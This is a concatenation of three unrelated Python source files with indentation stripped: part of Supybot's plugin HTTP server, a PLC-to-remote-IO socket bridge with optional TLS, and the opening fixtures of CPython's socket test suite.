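# .example file.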
for filename, content in defaults.items():
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path + '.example'):
os.unlink(path + '.example')
if not os.path.isdir(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
with open(path + '.example', 'a') as fd:
fd.write(content)
set_default_templates(DEFAULT_TEMPLATES)
def get_template(filename):
path = conf.supybot.directories.data.web.dirize(filename)
if os.path.isfile(path):
with open(path, 'r') as fd:
return fd.read()
else:
assert os.path.isfile(path + '.example'), path + '.example'
with open(path + '.example', 'r') as fd:
return fd.read()
class SupyHTTPRequestHandler(BaseHTTPRequestHandler):
def do_X(self, callbackMethod, *args, **kwargs):
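# Dispatch the request: built-in callbacks handle /, /robots.txt, /default.css
# and /favicon.ico; anything else is routed to the plugin hooked on the first
# path component, or to a 404 callback if none is registered.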
if self.path == '/':
callback = SupyIndex()
elif self.path in ('/robots.txt',):
callback = Static('text/plain; charset=utf-8')
elif self.path in ('/default.css',):
callback = Static('text/css')
elif self.path == '/favicon.ico':
callback = Favicon()
else:
subdir = self.path.split('/')[1]
try:
callback = self.server.callbacks[subdir]
except KeyError:
callback = Supy404()
# Some shortcuts
for name in ('send_response', 'send_header', 'end_headers', 'rfile',
'wfile', 'headers'):
setattr(callback, name, getattr(self, name))
# We call doX, because this is more supybotic than do_X.
path = self.path
if not callback.fullpath:
path = '/' + path.split('/', 2)[-1]
getattr(callback, callbackMethod)(self, path,
*args, **kwargs)
def do_GET(self):
self.do_X('doGet')
def do_POST(self):
if 'Content-Type' not in self.headers:
self.headers['Content-Type'] = 'application/x-www-form-urlencoded'
if self.headers['Content-Type'] == 'application/x-www-form-urlencoded':
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD':'POST',
'CONTENT_TYPE':self.headers['Content-Type'],
})
else:
content_length = int(self.headers.get('Content-Length', '0'))
form = self.rfile.read(content_length)
self.do_X('doPost', form=form)
def do_HEAD(self):
self.do_X('doHead')
def address_string(self):
s = BaseHTTPRequestHandler.address_string(self)
# Strip IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1
prefix = '::ffff:'
if s.startswith(prefix):
s = s[len(prefix):]
return s
def log_message(self, format, *args):
log.info('HTTP request: %s - %s' %
(self.address_string(), format % args))
class SupyHTTPServerCallback(log.Firewalled):
"""This is a base class that should be overriden by any plugin that want
to have a Web interface."""
__firewalled__ = {'doGet': None,
'doPost': None,
'doHead': None,
'doPut': None,
'doDelete': None,
}
fullpath = False
name = "Unnamed plugin"
defaultResponse = _("""
This is a default response of the Supybot HTTP server. If you see this
message, it probably means you are developing a plugin, and you have
neither overridden this message nor defined a handler for this query.""")
if minisix.PY3:
def write(self, b):
if isinstance(b, str):
b = b.encode()
self.wfile.write(b)
else:
def write(self, s):
self.wfile.write(s)
def doGetOrHead(self, handler, path, write_content):
response = self.defaultResponse.encode()
handler.send_response(405)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
def doGet(self, handler, path):
self.doGetOrHead(handler, path, write_content=True)
def doHead(self, handler, path):
self.doGetOrHead(handler, path, write_content=False)
doPost = doGet
def doWellKnown(self, handler, path):
"""Handles GET request to /.well-known/"""
return None
def doHook(self, handler, subdir):
"""Method called when hooking this callback."""
pass
def doUnhook(self, handler):
"""Method called when unhooking this callback."""
pass
class Supy404(SupyHTTPServerCallback):
"""A 404 Not Found error."""
name = "Error 404"
fullpath = True
response = _("""
I am a pretty clever IRC bot, but I suck at serving Web pages, particularly
if I don't know what to serve.
What I'm saying is you just triggered a 404 Not Found, and I am not
trained to help you in such a case.""")
def doGetOrHead(self, handler, path, write_content):
response = self.response
if minisix.PY3:
response = response.encode()
handler.send_response(404)
self.send_header('Content-Type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class SupyIndex(SupyHTTPServerCallback):
"""Displays the index of available plugins."""
name = "index"
defaultResponse = _("Request not handled.")
def doGetOrHead(self, handler, path, write_content):
plugins = [x for x in handler.server.callbacks.items()]
if plugins == []:
plugins = _('No plugins available.')
else:
plugins = '<ul class="plugins"><li>%s</li></ul>' % '</li><li>'.join(
['<a href="/%s/">%s</a>' % (x,y.name) for x,y in plugins])
response = get_template('index.html') % {'list': plugins}
if minisix.PY3:
response = response.encode()
handler.send_response(200)
self.send_header('Content-Type', 'text/html; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class Static(SupyHTTPServerCallback):
"""Serves static files."""
fullpath = True
name = 'static'
defaultResponse = _('Request not handled')
def __init__(self, mimetype='text/plain; charset=utf-8'):
super(Static, self).__init__()
self._mimetype = mimetype
def doGetOrHead(self, handler, path, write_content):
response = get_template(path)
if minisix.PY3:
response = response.encode()
handler.send_response(200)
self.send_header('Content-type', self._mimetype)
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class Favicon(SupyHTTPServerCallback):
"""Services the favicon.ico file to browsers."""
name = 'favicon'
defaultResponse = _('Request not handled')
def doGetOrHead(self, handler, path, write_content):
response = None
file_path = conf.supybot.servers.http.favicon()
if file_path:
try:
icon = open(file_path, 'rb')
response = icon.read()
except IOError:
pass
finally:
icon.close()
if response is not None:
# I have no idea why, but these headers are already sent.
# filename = file_path.rsplit(os.sep, 1)[1]
# if '.' in filename:
# ext = filename.rsplit('.', 1)[1]
# else:
# ext = 'ico'
# self.send_header('Content-Length', len(response))
# self.send_header('Content-type', 'image/' + ext)
# self.end_headers()
if write_content:
self.wfile.write(response)
else:
response = _('No favicon set.')
if minisix.PY3:
response = response.encode()
handler.send_response(404)
self.send_header('Content-type', 'text/plain; charset=utf-8')
self.send_header('Content-Length', len(response))
self.end_headers()
if write_content:
self.wfile.write(response)
class SupyWellKnown(SupyHTTPServerCallback):
"""Serves /.well-known/ resources."""
name = 'well-known'
defaultResponse = _('Request not handled')
def doGetOrHead(self, handler, path, write_content):
for callback in handler.server.callbacks.values():
resp = callback.doWellKnown(handler, path)
if resp:
(status, headers, content) = resp
handler.send_response(status)
for header in headers.items():
self.send_header(*header)
self.end_headers()
if write_content:
self.wfile.write(content)
return
handler.send_response(404)
self.end_headers()
DEFAULT_CALLBACKS = {'.well-known': SupyWellKnown()}
class RealSupyHTTPServer(HTTPServer):
# TODO: make this configurable
timeout = 0.5
running = False
def __init__(self, address, protocol, callback):
self.protocol = protocol
if protocol == 4:
self.address_family = socket.AF_INET
elif protocol == 6:
self.address_family = socket.AF_INET6
else:
raise AssertionError(protocol)
HTTPServer.__init__(self, address, callback)
self.callbacks = DEFAULT_CALLBACKS.copy()
def server_bind(self):
if self.protocol == 6:
v = conf.supybot.servers.http.singleStack()
self.socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, v)
HTTPServer.server_bind(self)
def hook(self, subdir, callback):
if subdir in self.callbacks:
log.warning(('The HTTP subdirectory `%s` was already hooked, but '
'has now been claimed by another plugin (or maybe you '
'reloaded the plugin and it did not unhook properly). '
'Forcing an unhook.') % subdir)
self.callbacks[subdir] = callback
callback.doHook(self, subdir)
def unhook(self, subdir):
callback = self.callbacks.pop(subdir, None)
if callback:
callback.doUnhook(self)
return callback
def __str__(self):
return 'server at %s %i' % self.server_address[0:2]
class TestSupyHTTPServer(RealSupyHTTPServer):
def __init__(self, *args, **kwargs):
self.callbacks = {}
def serve_forever(self, *args, **kwargs):
pass
def shutdown(self, *args, **kwargs):
pass
if world.testing:
SupyHTTPServer = TestSupyHTTPServer
else:
SupyHTTPServer = RealSupyHTTPServer
http_servers = []
def startServer():
"""Starts the HTTP server. Shouldn't be called from other modules.
The callback should be an instance of a child of SupyHTTPServerCallback."""
global http_servers
addresses4 = [(4, (x, configGroup.port()))
for x in configGroup.hosts4() if x != '']
addresses6 = [(6, (x, configGroup.port()))
for x in configGroup.hosts6() if x != '']
http_servers = []
for protocol, address in (addresses4 + addresses6):
server = SupyHTTPServer(address, protocol, SupyHTTPRequestHandler)
Thread(target=server.serve_forever, name='HTTP Server').start()
http_servers.append(server)
log.info('Starting HTTP server: %s' % str(server))
def stopServer():
"""Stops the HTTP server. Should be run only from this module or from
when the bot is dying (ie. from supybot.world)"""
global http_servers
for server in http_servers:
log.info('Stopping HTTP server: %s' % str(server))
server.shutdown()
server = None
if configGroup.keepAlive():
startServer()
def hook(subdir, callback):
"""Sets a callback for a given subdir."""
if not http_servers:
startServer()
assert isinstance(http_servers, list)
for server in http_servers:
server.hook(subdir, callback)
def unhook(subdir):
"""Unsets the callback assigned to the given subdir, and return it."""
global http_servers
assert isinstance(http_servers, list)
for server in list(http_servers):
server.unhook(subdir)
if len(set(server.callbacks) - set(DEFAULT_CALLBACKS)) <= 0 \
and not configGroup.keepAlive():
server.shutdown()
http_servers.remove(server)
|
bridge.py
|
"""
This module contains the Bridge class.
"""
import socket
import ssl
from multiprocessing import Process
from struct import unpack
from threading import Thread
from typing import Tuple
from config import Config
CONNECTION_TIMEOUT = 15
HEADER_SIZE = 6
MAX_PACKET_SIZE = 1024
class Bridge(Process):
"""
A single bridge that manages the connection between 2 devices.
"""
def __init__(self, context: Config):
super(Bridge, self).__init__()
self.cfg = context
self.name = 'Bridge-' + self.cfg.name
self.sock_plc = None
self.conn_plc = None
self.sock_io = None
self.ssock_io = None
self.ssl_context = None
self.conn_start = None
self.start()
def run(self) -> None:
print('[{}] Starting... '.format(self.name))
self._init_connections()
self._start_connection_handler()
while True:
message = self.cfg.q_manage_in.get()
if message == 'END':
self._close_connections()
return
else:
print('[{}] Unknown message: {}'.format(self.name, message))
def _close_connections(self) -> None:
if self.conn_plc is not None:
self.conn_plc.close()
if self.sock_plc is not None:
self.sock_plc.close()
if self.sock_io is not None:
self.sock_io.close()
print('[{}] connections closed!'.format(self.name))
def _error(self) -> None:
self._close_connections()
self.cfg.q_manage_out.put('Error')
exit(1)
@staticmethod
def _check_msg(msg: bytes) -> bytes:
if msg == b'':
raise Exception('connection closed')
return msg
def _start_connection_handler(self) -> None:
def handle_plc_incoming() -> None:
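# Relay loop: read one framed message from the PLC and forward it to the
# remote IO, then read the reply from the remote IO and forward it back to
# the PLC. A timeout or closed socket tears the bridge down via _error().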
self.ssock_io.settimeout(self.cfg.timeout)
self.conn_plc.settimeout(self.cfg.timeout)
try:
while True:
# recv from plc and send to io
msg = Bridge._get_message(self.conn_plc)
# print('PLC:', msg)
msg = self._check_msg(msg)
self._send_message(msg, 'remoteIO')
# recv from io and send to plc
msg = Bridge._get_message(self.ssock_io)
# print('IO :', msg)
msg = self._check_msg(msg)
self._send_message(msg, 'plc')
except socket.timeout:
print('[{}] Socket timed out!'.format(self.name))
self._error()
except Exception as exception:
print(exception)
self._error()
Thread(target=handle_plc_incoming).start()
@staticmethod
def _get_header(sock: socket.socket) -> Tuple[bytes, int]:
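# The 6-byte header is read in full before the payload; it unpacks as three
# big-endian uint16 fields (transaction id, protocol id, remaining length),
# which matches the Modbus/TCP MBAP layout -- an assumption based on the
# PLC/remote-IO context, not something stated explicitly in this module.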
header = b''
while len(header) < HEADER_SIZE:
header += sock.recv(HEADER_SIZE - len(header))
_trans_id, _prot_id, length = unpack('!HHH', header)
return header, length
@staticmethod
def _get_payload(sock: socket.socket, length: int) -> bytes:
payload = b''
while len(payload) < length:
payload += sock.recv(length - len(payload))
return payload
@staticmethod
def _get_message(sock: socket.socket) -> bytes:
header, length = Bridge._get_header(sock)
payload = Bridge._get_payload(sock, length)
return header + payload
def _init_connections(self) -> None:
self._init_io_connection()
self._init_plc_connection()
def _init_io_connection(self) -> None:
self.sock_io = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_io.settimeout(CONNECTION_TIMEOUT)
self.sock_io.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
if self.cfg.secure:
self._init_ssl_context()
self.ssock_io = self.ssl_context.wrap_socket(
self.sock_io, server_side=False,
server_hostname=self.cfg.io_name)
print('[{}] Connecting to remoteIO ({}:{})'.format(
self.name, self.cfg.host_io, self.cfg.port_io))
self.ssock_io.connect((self.cfg.host_io, self.cfg.port_io))
print('[{}] Connected to remoteIO in ssl using {}'.format(
self.name, self.ssock_io.version()))
else:
self.ssock_io = self.sock_io
print('[{}] Connecting to remoteIO'.format(self.name))
self.ssock_io.connect((self.cfg.host_io, self.cfg.port_io))
print('[{}] Connected to remoteIO'.format(self.name))
except socket.timeout:
print('[{}] socket timed out during connection '
'establishment!'.format(self.name))
self._error()
except Exception as exc:
print('[{}] Exception during connection '
'establishment:'.format(self.name))
print(exc)
self._error()
def _init_plc_connection(self) -> None:
try:
self.sock_plc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock_plc.settimeout(CONNECTION_TIMEOUT)
self.sock_plc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock_plc.bind(('', self.cfg.port_plc))
self.sock_plc.listen()
print('[{}] waiting for plc to connect'.format(self.name))
self.conn_plc, _addr = self.sock_plc.accept()
print('[{}] plc connected'.format(self.name))
print('[{}] connected {}:{} to localhost:{}'.format(
self.name, _addr[0], _addr[1], self.cfg.port_plc))
except socket.timeout:
print('[{}] socket timed out during connection '
'establishment!'.format(self.name))
self._error()
except Exception as exc:
print('[{}] Exception during connection establishment:'.format(self.name))
print(exc)
self._error()
def _init_ssl_context(self) -> None:
self.ssl_context = ssl.create_default_context(
ssl.Purpose.SERVER_AUTH, cafile=self.cfg.io_cert)
self.ssl_context.load_cert_chain(
certfile=self.cfg.plc_cert, keyfile=self.cfg.plc_key)
def _send_message(self, msg: bytes, dest: str) -> None:
dest = dest.lower()
if dest == 'remoteio':
self.ssock_io.send(msg)
elif dest == 'plc':
self.conn_plc.send(msg)
else:
raise AttributeError('invalid destination')
|
test_socket.py
|
import unittest
from test import support
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = socket_helper.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
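# Query the local VSOCK context ID (CID) with an ioctl on /dev/vsock; returns
# None when fcntl or VSOCK support is unavailable, which callers treat as
# "AF_VSOCK not supported on this host".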
if fcntl is None:
return None
if not hasattr(socket, 'IOCTL_VM_SOCKETS_GET_LOCAL_CID'):
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_j1939():
"""Check whether CAN J1939 sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_J1939)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
def _have_socket_bluetooth():
"""Check whether AF_BLUETOOTH sockets are supported on this host."""
try:
# RFCOMM is supported by all platforms with bluetooth support. Windows
# does not support omitting the protocol.
s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_STREAM, socket.BTPROTO_RFCOMM)
except (AttributeError, OSError):
return False
else:
s.close()
return True
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_CAN_J1939 = _have_socket_can_j1939()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
HAVE_SOCKET_UDPLITE = hasattr(socket, "IPPROTO_UDPLITE")
HAVE_SOCKET_BLUETOOTH = _have_socket_bluetooth()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = socket_helper.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPLITETest(SocketUDPTest):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
self.port = socket_helper.bind_port(self.serv)
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ip link set up vcan0
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = socket_helper.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
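# Each test case is split into a server half (run in this thread) and a
# client half (the '_'-prefixed method, run in a new thread started below);
# client-side exceptions are shipped back through self.queue and re-raised
# in _tearDown().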
self.wait_threads = threading_helper.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
self.wait_threads.__exit__(None, None, None)
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
try:
self.clientSetUp()
except BaseException as e:
self.queue.put(e)
self.clientTearDown()
return
finally:
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class ThreadedUDPLITESocketTest(SocketUDPLITETest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPLITETest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDPLITE)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
"This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.serv.close)
self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
self.serv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.serv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
time.sleep(0.1)
self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
cid = get_cid()
self.cli.connect((cid, VSOCKPORT))
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
try:
self.serv_conn.close()
self.serv_conn = None
except AttributeError:
pass
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
socket_helper.bind_unix_socket(sock, path)
self.addCleanup(os_helper.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
